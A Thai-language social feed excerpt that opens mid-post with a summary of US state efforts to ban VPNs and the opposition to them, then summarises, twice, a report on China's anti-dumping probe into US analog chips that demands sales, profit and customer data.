ๆ ปกป้องสิทธิในการใช้ VPN ➡️ ชี้ว่า VPN เป็นเครื่องมือสำคัญในการรักษาความปลอดภัยและเสรีภาพ ➡️ ยกตัวอย่างการใช้ VPN ในการจัดการประท้วงในเนปาล ✅ บริบททางการเมืองและเทคโนโลยี ➡️ กฎหมายนี้สะท้อนแนวโน้มการเซ็นเซอร์ที่เพิ่มขึ้นในสหรัฐฯ และยุโรป ➡️ สหราชอาณาจักรก็เคยเสนอจำกัด VPN หลังยอดดาวน์โหลดพุ่ง ➡️ การแบน VPN อาจทำให้สหรัฐฯ ถูกเปรียบเทียบกับรัฐเผด็จการ เช่น รัสเซีย, อิหร่าน, เกาหลีเหนือ ➡️ VPN เป็นเครื่องมือสำคัญในโลกไซเบอร์ที่เต็มไปด้วยภัยคุกคาม https://www.slashgear.com/1998517/us-states-vpn-ban-protests-day-of-action/
    WWW.SLASHGEAR.COM
    US States Want To Ban VPNs, But Citizens Are Already Fighting Back - SlashGear
    The Michigan ban is about more than moderating content. VPNs play an essential role in protecting citizens' right to access and share information.
    0 Comments 0 Shares 145 Views 0 Reviews
  • “จีนเปิดฉากสอบสวน ‘แอนะล็อกชิป’ จากสหรัฐ – ขอข้อมูลลูกค้า กำไร และต้นทุนแบบละเอียด!”

    จีนกำลังดำเนินการสอบสวนการทุ่มตลาด (anti-dumping) ต่อชิปแอนะล็อกที่ผลิตในสหรัฐฯ โดยเฉพาะจากบริษัทอย่าง Texas Instruments และ Analog Devices ซึ่งเป็นผู้ผลิตรายใหญ่ในตลาดนี้ โดยกระทรวงพาณิชย์ของจีนได้ส่งแบบสอบถามไปยังบริษัทสหรัฐฯ เพื่อขอข้อมูลละเอียดเกี่ยวกับยอดขาย ต้นทุน กำไร และชื่อของลูกค้าในจีน

    แบบสอบถามนี้ครอบคลุมข้อมูลเชิงลึก เช่น ปริมาณการขาย ค่าขนส่ง ค่าคลังสินค้า และต้นทุนวัตถุดิบ โดยบริษัทมีเวลา 37 วันในการตอบกลับ ซึ่งถือเป็นการเคลื่อนไหวที่เกิดขึ้นในช่วงที่จีนและสหรัฐฯ กำลังเจรจาการค้าระดับสูง

    แม้จะไม่มีการระบุชื่อบริษัทอย่างเป็นทางการ แต่ลักษณะของชิปที่ถูกสอบสวน—เช่น commodity interface IC และ gate driver IC ที่ใช้เทคโนโลยี 40nm ขึ้นไป—ตรงกับผลิตภัณฑ์ของบริษัทสหรัฐฯ หลายราย

    การสอบสวนนี้เกิดขึ้นหลังจากจีนถูกสหรัฐฯ จำกัดการเข้าถึงชิป AI ระดับสูง และใช้การอนุญาตฮาร์ดแวร์ของ NVIDIA เป็นเครื่องมือในการเจรจา ทำให้จีนตอบโต้ด้วยการเปิดการสอบสวนด้านการทุ่มตลาดและการเลือกปฏิบัติ

    รายละเอียดการสอบสวนของจีน
    กระทรวงพาณิชย์จีนส่งแบบสอบถามไปยังบริษัทสหรัฐฯ
    ขอข้อมูลยอดขาย กำไร ต้นทุน และชื่อลูกค้าในจีน
    ครอบคลุมข้อมูลเช่นค่าขนส่ง ค่าคลังสินค้า และวัตถุดิบ
    บริษัทมีเวลา 37 วันในการตอบกลับ
    สอบสวนชิปแอนะล็อก เช่น interface IC และ gate driver IC

    บริบททางการค้าและการตอบโต้
    เกิดขึ้นในช่วงเจรจาการค้าระหว่างจีน-สหรัฐฯ
    สหรัฐฯ จำกัดการเข้าถึงชิป AI ระดับสูง
    จีนตอบโต้ด้วยการสอบสวนการทุ่มตลาดและการเลือกปฏิบัติ
    เป็นสัญญาณว่าจีนสามารถใช้มาตรการตอบโต้ทางการค้าได้
    การสอบสวนอาจนำไปสู่การจำกัดการนำเข้าชิปจากสหรัฐฯ

    https://www.tomshardware.com/tech-industry/china-wants-us-semiconductor-companies-to-submit-sensitive-data-as-part-of-probe-anti-dumping-investigation-requests-sales-and-profit-data
    🇨🇳 “จีนเปิดฉากสอบสวน ‘แอนะล็อกชิป’ จากสหรัฐ – ขอข้อมูลลูกค้า กำไร และต้นทุนแบบละเอียด!” จีนกำลังดำเนินการสอบสวนการทุ่มตลาด (anti-dumping) ต่อชิปแอนะล็อกที่ผลิตในสหรัฐฯ โดยเฉพาะจากบริษัทอย่าง Texas Instruments และ Analog Devices ซึ่งเป็นผู้ผลิตรายใหญ่ในตลาดนี้ โดยกระทรวงพาณิชย์ของจีนได้ส่งแบบสอบถามไปยังบริษัทสหรัฐฯ เพื่อขอข้อมูลละเอียดเกี่ยวกับยอดขาย ต้นทุน กำไร และชื่อของลูกค้าในจีน แบบสอบถามนี้ครอบคลุมข้อมูลเชิงลึก เช่น ปริมาณการขาย ค่าขนส่ง ค่าคลังสินค้า และต้นทุนวัตถุดิบ โดยบริษัทมีเวลา 37 วันในการตอบกลับ ซึ่งถือเป็นการเคลื่อนไหวที่เกิดขึ้นในช่วงที่จีนและสหรัฐฯ กำลังเจรจาการค้าระดับสูง แม้จะไม่มีการระบุชื่อบริษัทอย่างเป็นทางการ แต่ลักษณะของชิปที่ถูกสอบสวน—เช่น commodity interface IC และ gate driver IC ที่ใช้เทคโนโลยี 40nm ขึ้นไป—ตรงกับผลิตภัณฑ์ของบริษัทสหรัฐฯ หลายราย การสอบสวนนี้เกิดขึ้นหลังจากจีนถูกสหรัฐฯ จำกัดการเข้าถึงชิป AI ระดับสูง และใช้การอนุญาตฮาร์ดแวร์ของ NVIDIA เป็นเครื่องมือในการเจรจา ทำให้จีนตอบโต้ด้วยการเปิดการสอบสวนด้านการทุ่มตลาดและการเลือกปฏิบัติ ✅ รายละเอียดการสอบสวนของจีน ➡️ กระทรวงพาณิชย์จีนส่งแบบสอบถามไปยังบริษัทสหรัฐฯ ➡️ ขอข้อมูลยอดขาย กำไร ต้นทุน และชื่อลูกค้าในจีน ➡️ ครอบคลุมข้อมูลเช่นค่าขนส่ง ค่าคลังสินค้า และวัตถุดิบ ➡️ บริษัทมีเวลา 37 วันในการตอบกลับ ➡️ สอบสวนชิปแอนะล็อก เช่น interface IC และ gate driver IC ✅ บริบททางการค้าและการตอบโต้ ➡️ เกิดขึ้นในช่วงเจรจาการค้าระหว่างจีน-สหรัฐฯ ➡️ สหรัฐฯ จำกัดการเข้าถึงชิป AI ระดับสูง ➡️ จีนตอบโต้ด้วยการสอบสวนการทุ่มตลาดและการเลือกปฏิบัติ ➡️ เป็นสัญญาณว่าจีนสามารถใช้มาตรการตอบโต้ทางการค้าได้ ➡️ การสอบสวนอาจนำไปสู่การจำกัดการนำเข้าชิปจากสหรัฐฯ https://www.tomshardware.com/tech-industry/china-wants-us-semiconductor-companies-to-submit-sensitive-data-as-part-of-probe-anti-dumping-investigation-requests-sales-and-profit-data
    WWW.TOMSHARDWARE.COM
    China wants US semiconductor companies to submit sensitive data as part of probe — 'anti-dumping' investigation requests sales and profit data
    No specific businesses have been named, but the probe seems designed to target Texas Instruments and Analog Devices.
    0 Comments 0 Shares 102 Views 0 Reviews
More Results